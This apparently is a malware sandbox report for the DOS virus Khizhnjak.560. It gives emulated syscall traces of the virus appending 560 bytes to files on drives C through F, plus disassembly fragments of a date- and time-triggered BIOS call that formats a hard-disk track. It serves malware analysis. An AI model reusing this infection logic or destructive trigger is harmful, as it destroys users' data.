Sample viewer

vx.netlux.org/Virus.DOS.Khizhnjak.560

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-17T22:35:08.360650751Z	25	PC: 13e54 \| Get default drive
2018-12-17T22:35:08.362607891Z	14	PC: 13e5d \| Set default drive (Drive = 'C')
2018-12-17T22:35:08.364677292Z	78	PC: 13e8e \| Find first file
2018-12-17T22:35:08.370650955Z	67	PC: 13ed9 \| Get or set file attributes
2018-12-17T22:35:09.090304622Z	61	PC: 13ee3 \| Open file (Filename = '')
2018-12-17T22:35:09.097209842Z	63	PC: 13f01 \| Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:35:09.101199475Z	66	PC: 13f3a \| Move file pointer
2018-12-17T22:35:09.103114637Z	63	PC: 13f44 \| Read file or device (Read 1 bytes on handle 5)
2018-12-17T22:35:09.107466388Z	87	PC: 13f58 \| Get or set file date and time
2018-12-17T22:35:09.109173119Z	66	PC: 13f78 \| Move file pointer
2018-12-17T22:35:09.110982643Z	64	PC: 13f85 \| Write file or device (Write 560 bytes on handle 5)
2018-12-17T22:35:09.118677554Z	66	PC: 13f90 \| Move file pointer
2018-12-17T22:35:09.121222948Z	64	PC: 13f9c \| Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:35:09.12455658Z	87	PC: 13fab \| Get or set file date and time
2018-12-17T22:35:09.127472619Z	42	PC: 13faf \| Get date 0x13faf: cmp dh, 5 0x13fb2: jge 0x13fd7 0x13fb4: mov ah, 0x2c 0x13fb6: int 0x21 0x13fb8: cmp ch, 1 0x13fbb: jne 0x13fd7 0x13fbd: mov bx, 0x100 0x13fc0: mov dx, 0x80 0x13fc3: mov cx, 1 0x13fc6: mov ax, 0x501 0x13fc9: int 0x13 0x13fcb: jb 0x13fd7 0x13fcd: mov ax, 0x1b5 0x13fd0: push ax 0x13fd1: mov bx, 0x2f6 0x13fd4: inc bx 0x13fd5: jmp bx 0x13fd7: cmp word ptr [0x310], -1 0x13fdc: je 0x13fe6 0x13fde: mov bx, word ptr [0x310]
2018-12-17T22:35:09.130212978Z	62	PC: 13fe6 \| Close file
2018-12-17T22:35:09.136872257Z	14	PC: 14000 \| Set default drive (Drive = 'D')
2018-12-17T22:35:09.138860286Z	78	PC: 13e8e \| Find first file
2018-12-17T22:35:09.143301866Z	67	PC: 13ed9 \| Get or set file attributes
2018-12-17T22:35:09.151211931Z	61	PC: 13ee3 \| Open file (Filename = '')
2018-12-17T22:35:09.159585184Z	63	PC: 13f01 \| Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:35:09.178172815Z	66	PC: 13f3a \| Move file pointer
2018-12-17T22:35:09.188783224Z	63	PC: 13f44 \| Read file or device (Read 1 bytes on handle 5)
2018-12-17T22:35:09.193603404Z	62	PC: 13e9b \| Close file
2018-12-17T22:35:09.196338984Z	79	PC: 13ea5 \| Find next file
2018-12-17T22:35:09.199301881Z	42	PC: 13faf \| Get date 0x13faf: cmp dh, 5 0x13fb2: jge 0x13fd7 0x13fb4: mov ah, 0x2c 0x13fb6: int 0x21 0x13fb8: cmp ch, 1 0x13fbb: jne 0x13fd7 0x13fbd: mov bx, 0x100 0x13fc0: mov dx, 0x80 0x13fc3: mov cx, 1 0x13fc6: mov ax, 0x501 0x13fc9: int 0x13 0x13fcb: jb 0x13fd7 0x13fcd: mov ax, 0x1b5 0x13fd0: push ax 0x13fd1: mov bx, 0x2f6 0x13fd4: inc bx 0x13fd5: jmp bx 0x13fd7: cmp word ptr [0x310], -1 0x13fdc: je 0x13fe6 0x13fde: mov bx, word ptr [0x310]
2018-12-17T22:35:09.201938867Z	14	PC: 14000 \| Set default drive (Drive = 'E')
2018-12-17T22:35:09.204133934Z	78	PC: 13e8e \| Find first file
2018-12-17T22:35:09.209830768Z	67	PC: 13ed9 \| Get or set file attributes
2018-12-17T22:35:09.21908869Z	61	PC: 13ee3 \| Open file (Filename = '')
2018-12-17T22:35:09.227567071Z	63	PC: 13f01 \| Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:35:09.230761122Z	66	PC: 13f3a \| Move file pointer
2018-12-17T22:35:09.232550748Z	63	PC: 13f44 \| Read file or device (Read 1 bytes on handle 5)
2018-12-17T22:35:09.237067419Z	62	PC: 13e9b \| Close file
2018-12-17T22:35:09.23927567Z	79	PC: 13ea5 \| Find next file
2018-12-17T22:35:09.243076148Z	42	PC: 13faf \| Get date 0x13faf: cmp dh, 5 0x13fb2: jge 0x13fd7 0x13fb4: mov ah, 0x2c 0x13fb6: int 0x21 0x13fb8: cmp ch, 1 0x13fbb: jne 0x13fd7 0x13fbd: mov bx, 0x100 0x13fc0: mov dx, 0x80 0x13fc3: mov cx, 1 0x13fc6: mov ax, 0x501 0x13fc9: int 0x13 0x13fcb: jb 0x13fd7 0x13fcd: mov ax, 0x1b5 0x13fd0: push ax 0x13fd1: mov bx, 0x2f6 0x13fd4: inc bx 0x13fd5: jmp bx 0x13fd7: cmp word ptr [0x310], -1 0x13fdc: je 0x13fe6 0x13fde: mov bx, word ptr [0x310]
2018-12-17T22:35:09.24632967Z	14	PC: 14000 \| Set default drive (Drive = 'F')
2018-12-17T22:35:09.247700561Z	78	PC: 13e8e \| Find first file
2018-12-17T22:35:09.253182021Z	67	PC: 13ed9 \| Get or set file attributes
2018-12-17T22:35:09.262296555Z	61	PC: 13ee3 \| Open file (Filename = '')
2018-12-17T22:35:09.269334444Z	63	PC: 13f01 \| Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:35:09.272405584Z	66	PC: 13f3a \| Move file pointer
2018-12-17T22:35:09.274231689Z	63	PC: 13f44 \| Read file or device (Read 1 bytes on handle 5)
2018-12-17T22:35:09.278488923Z	62	PC: 13e9b \| Close file
2018-12-17T22:35:09.280667128Z	79	PC: 13ea5 \| Find next file
2018-12-17T22:35:09.298148904Z	42	PC: 13faf \| Get date 0x13faf: cmp dh, 5 0x13fb2: jge 0x13fd7 0x13fb4: mov ah, 0x2c 0x13fb6: int 0x21 0x13fb8: cmp ch, 1 0x13fbb: jne 0x13fd7 0x13fbd: mov bx, 0x100 0x13fc0: mov dx, 0x80 0x13fc3: mov cx, 1 0x13fc6: mov ax, 0x501 0x13fc9: int 0x13 0x13fcb: jb 0x13fd7 0x13fcd: mov ax, 0x1b5 0x13fd0: push ax 0x13fd1: mov bx, 0x2f6 0x13fd4: inc bx 0x13fd5: jmp bx 0x13fd7: cmp word ptr [0x310], -1 0x13fdc: je 0x13fe6 0x13fde: mov bx, word ptr [0x310]
2018-12-17T22:35:09.301865915Z	14	PC: 1400b \| Set default drive (Drive = 'A')
2018-12-17T22:35:09.303917062Z	9	PC: 12a85 \| Display string (String= ' ')
2018-12-17T22:35:09.310376997Z	0	PC: 12a89 \| Program terminate

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":6310,"SideJobID":0}

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T11:59:03.81155116Z	25	PC: 13e54 \| Get default drive
2018-12-25T11:59:03.813289547Z	14	PC: 13e5d \| Set default drive (Drive = 'C')
2018-12-25T11:59:03.815564714Z	78	PC: 13e8e \| Find first file
2018-12-25T11:59:03.822140462Z	67	PC: 13ed9 \| Get or set file attributes
2018-12-25T11:59:04.165980086Z	61	PC: 13ee3 \| Open file (Filename = '')
2018-12-25T11:59:04.174548256Z	63	PC: 13f01 \| Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:59:04.178315216Z	66	PC: 13f3a \| Move file pointer
2018-12-25T11:59:04.180247551Z	63	PC: 13f44 \| Read file or device (Read 1 bytes on handle 5)
2018-12-25T11:59:04.1850517Z	87	PC: 13f58 \| Get or set file date and time
2018-12-25T11:59:04.186996177Z	66	PC: 13f78 \| Move file pointer
2018-12-25T11:59:04.188937635Z	64	PC: 13f85 \| Write file or device (Write 560 bytes on handle 5)
2018-12-25T11:59:04.201392663Z	66	PC: 13f90 \| Move file pointer
2018-12-25T11:59:04.207312498Z	64	PC: 13f9c \| Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:59:04.213579621Z	87	PC: 13fab \| Get or set file date and time
2018-12-25T11:59:04.216613988Z	42	PC: 13faf \| Get date 0x13faf: cmp dh, 5 0x13fb2: jge 0x13fd7 0x13fb4: mov ah, 0x2c 0x13fb6: int 0x21 0x13fb8: cmp ch, 1 0x13fbb: jne 0x13fd7 0x13fbd: mov bx, 0x100 0x13fc0: mov dx, 0x80 0x13fc3: mov cx, 1 0x13fc6: mov ax, 0x501 0x13fc9: int 0x13 0x13fcb: jb 0x13fd7 0x13fcd: mov ax, 0x1b5 0x13fd0: push ax 0x13fd1: mov bx, 0x2f6 0x13fd4: inc bx 0x13fd5: jmp bx 0x13fd7: cmp word ptr [0x310], -1 0x13fdc: je 0x13fe6 0x13fde: mov bx, word ptr [0x310]
2018-12-25T11:59:04.21955359Z	44	PC: 13fb8 \| Get time 0x13fb8: cmp ch, 1 0x13fbb: jne 0x13fd7 0x13fbd: mov bx, 0x100 0x13fc0: mov dx, 0x80 0x13fc3: mov cx, 1 0x13fc6: mov ax, 0x501 0x13fc9: int 0x13 0x13fcb: jb 0x13fd7 0x13fcd: mov ax, 0x1b5 0x13fd0: push ax 0x13fd1: mov bx, 0x2f6 0x13fd4: inc bx 0x13fd5: jmp bx 0x13fd7: cmp word ptr [0x310], -1 0x13fdc: je 0x13fe6 0x13fde: mov bx, word ptr [0x310] 0x13fe2: mov ah, 0x3e 0x13fe4: int 0x21 0x13fe6: cmp word ptr cs:[0x103], -1 0x13fec: je 0x14021
2018-12-25T11:59:04.221801349Z	62	PC: 13fe6 \| Close file
2018-12-25T11:59:04.229564305Z	14	PC: 14000 \| Set default drive (Drive = 'D')
2018-12-25T11:59:04.2314406Z	78	PC: 13e8e \| Find first file (See above)
2018-12-25T11:59:04.237578916Z	67	PC: 13ed9 \| Get or set file attributes (See above)
2018-12-25T11:59:04.248163867Z	61	PC: 13ee3 \| Open file (See above)
2018-12-25T11:59:04.256217116Z	63	PC: 13f01 \| Read file or device (See above)
2018-12-25T11:59:04.259526114Z	66	PC: 13f3a \| Move file pointer (See above)
2018-12-25T11:59:04.262597115Z	63	PC: 13f44 \| Read file or device (See above)
2018-12-25T11:59:04.267018993Z	62	PC: 13e9b \| Close file
2018-12-25T11:59:04.269515945Z	79	PC: 13ea5 \| Find next file
2018-12-25T11:59:04.272605831Z	42	PC: 13faf \| Get date (See above)
2018-12-25T11:59:04.275600689Z	44	PC: 13fb8 \| Get time (See above)
2018-12-25T11:59:04.278420503Z	14	PC: 14000 \| Set default drive (See above)
2018-12-25T11:59:04.280111047Z	78	PC: 13e8e \| Find first file (See above)
2018-12-25T11:59:04.288046521Z	67	PC: 13ed9 \| Get or set file attributes (See above)
2018-12-25T11:59:04.298108031Z	61	PC: 13ee3 \| Open file (See above)
2018-12-25T11:59:04.305464228Z	63	PC: 13f01 \| Read file or device (See above)
2018-12-25T11:59:04.310059507Z	66	PC: 13f3a \| Move file pointer (See above)
2018-12-25T11:59:04.312024958Z	63	PC: 13f44 \| Read file or device (See above)
2018-12-25T11:59:04.315844601Z	62	PC: 13e9b \| Close file (See above)
2018-12-25T11:59:04.318353984Z	79	PC: 13ea5 \| Find next file (See above)
2018-12-25T11:59:04.321792352Z	42	PC: 13faf \| Get date (See above)
2018-12-25T11:59:04.324108923Z	44	PC: 13fb8 \| Get time (See above)
2018-12-25T11:59:04.326548491Z	14	PC: 14000 \| Set default drive (See above)
2018-12-25T11:59:04.328556026Z	78	PC: 13e8e \| Find first file (See above)
2018-12-25T11:59:04.334475243Z	67	PC: 13ed9 \| Get or set file attributes (See above)
2018-12-25T11:59:04.344648459Z	61	PC: 13ee3 \| Open file (See above)
2018-12-25T11:59:04.35267852Z	63	PC: 13f01 \| Read file or device (See above)
2018-12-25T11:59:04.357074295Z	66	PC: 13f3a \| Move file pointer (See above)
2018-12-25T11:59:04.358817849Z	63	PC: 13f44 \| Read file or device (See above)
2018-12-25T11:59:04.362931032Z	62	PC: 13e9b \| Close file (See above)
2018-12-25T11:59:04.364889907Z	79	PC: 13ea5 \| Find next file (See above)
2018-12-25T11:59:04.367779424Z	42	PC: 13faf \| Get date (See above)
2018-12-25T11:59:04.371606334Z	44	PC: 13fb8 \| Get time (See above)
2018-12-25T11:59:04.374064178Z	14	PC: 1400b \| Set default drive (Drive = 'A')
2018-12-25T11:59:04.375520059Z	9	PC: 12a85 \| Display string (String= ' ')
2018-12-25T11:59:04.382209763Z	0	PC: 12a89 \| Program terminate

{"DateBased":true,"Day":1,"Month":5,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":6310,"SideJobID":0}

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T11:59:03.903658733Z	25	PC: 13e54 \| Get default drive
2018-12-25T11:59:03.905540878Z	14	PC: 13e5d \| Set default drive (Drive = 'C')
2018-12-25T11:59:03.906849998Z	78	PC: 13e8e \| Find first file
2018-12-25T11:59:03.91222197Z	67	PC: 13ed9 \| Get or set file attributes
2018-12-25T11:59:04.242614237Z	61	PC: 13ee3 \| Open file (Filename = '')
2018-12-25T11:59:04.254721575Z	63	PC: 13f01 \| Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:59:04.257607889Z	66	PC: 13f3a \| Move file pointer
2018-12-25T11:59:04.259321108Z	63	PC: 13f44 \| Read file or device (Read 1 bytes on handle 5)
2018-12-25T11:59:04.262099019Z	87	PC: 13f58 \| Get or set file date and time
2018-12-25T11:59:04.263335618Z	66	PC: 13f78 \| Move file pointer
2018-12-25T11:59:04.265185624Z	64	PC: 13f85 \| Write file or device (Write 560 bytes on handle 5)
2018-12-25T11:59:04.272012555Z	66	PC: 13f90 \| Move file pointer
2018-12-25T11:59:04.273314667Z	64	PC: 13f9c \| Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:59:04.276227386Z	87	PC: 13fab \| Get or set file date and time
2018-12-25T11:59:04.278132721Z	42	PC: 13faf \| Get date 0x13faf: cmp dh, 5 0x13fb2: jge 0x13fd7 0x13fb4: mov ah, 0x2c 0x13fb6: int 0x21 0x13fb8: cmp ch, 1 0x13fbb: jne 0x13fd7 0x13fbd: mov bx, 0x100 0x13fc0: mov dx, 0x80 0x13fc3: mov cx, 1 0x13fc6: mov ax, 0x501 0x13fc9: int 0x13 0x13fcb: jb 0x13fd7 0x13fcd: mov ax, 0x1b5 0x13fd0: push ax 0x13fd1: mov bx, 0x2f6 0x13fd4: inc bx 0x13fd5: jmp bx 0x13fd7: cmp word ptr [0x310], -1 0x13fdc: je 0x13fe6 0x13fde: mov bx, word ptr [0x310]
2018-12-25T11:59:04.280178025Z	62	PC: 13fe6 \| Close file
2018-12-25T11:59:04.287215413Z	14	PC: 14000 \| Set default drive (Drive = 'D')
2018-12-25T11:59:04.289505343Z	78	PC: 13e8e \| Find first file (See above)
2018-12-25T11:59:04.295021859Z	67	PC: 13ed9 \| Get or set file attributes (See above)
2018-12-25T11:59:04.303764255Z	61	PC: 13ee3 \| Open file (See above)
2018-12-25T11:59:04.310476166Z	63	PC: 13f01 \| Read file or device (See above)
2018-12-25T11:59:04.313039156Z	66	PC: 13f3a \| Move file pointer (See above)
2018-12-25T11:59:04.314302314Z	63	PC: 13f44 \| Read file or device (See above)
2018-12-25T11:59:04.31820651Z	62	PC: 13e9b \| Close file
2018-12-25T11:59:04.320118297Z	79	PC: 13ea5 \| Find next file
2018-12-25T11:59:04.322963551Z	42	PC: 13faf \| Get date (See above)
2018-12-25T11:59:04.326406841Z	14	PC: 14000 \| Set default drive (See above)
2018-12-25T11:59:04.327823345Z	78	PC: 13e8e \| Find first file (See above)
2018-12-25T11:59:04.333264443Z	67	PC: 13ed9 \| Get or set file attributes (See above)
2018-12-25T11:59:04.343692148Z	61	PC: 13ee3 \| Open file (See above)
2018-12-25T11:59:04.349736919Z	63	PC: 13f01 \| Read file or device (See above)
2018-12-25T11:59:04.352469668Z	66	PC: 13f3a \| Move file pointer (See above)
2018-12-25T11:59:04.354495925Z	63	PC: 13f44 \| Read file or device (See above)
2018-12-25T11:59:04.357714704Z	62	PC: 13e9b \| Close file (See above)
2018-12-25T11:59:04.359788744Z	79	PC: 13ea5 \| Find next file (See above)
2018-12-25T11:59:04.363184619Z	42	PC: 13faf \| Get date (See above)
2018-12-25T11:59:04.365617873Z	14	PC: 14000 \| Set default drive (See above)
2018-12-25T11:59:04.36707013Z	78	PC: 13e8e \| Find first file (See above)
2018-12-25T11:59:04.372892693Z	67	PC: 13ed9 \| Get or set file attributes (See above)
2018-12-25T11:59:04.381790296Z	61	PC: 13ee3 \| Open file (See above)
2018-12-25T11:59:04.388144991Z	63	PC: 13f01 \| Read file or device (See above)
2018-12-25T11:59:04.397968005Z	66	PC: 13f3a \| Move file pointer (See above)
2018-12-25T11:59:04.399342438Z	63	PC: 13f44 \| Read file or device (See above)
2018-12-25T11:59:04.402224391Z	62	PC: 13e9b \| Close file (See above)
2018-12-25T11:59:04.404507548Z	79	PC: 13ea5 \| Find next file (See above)
2018-12-25T11:59:04.407121403Z	42	PC: 13faf \| Get date (See above)
2018-12-25T11:59:04.409113946Z	14	PC: 1400b \| Set default drive (Drive = 'A')
2018-12-25T11:59:04.411166865Z	9	PC: 12a85 \| Display string (String= ' ')
2018-12-25T11:59:04.417015481Z	0	PC: 12a89 \| Program terminate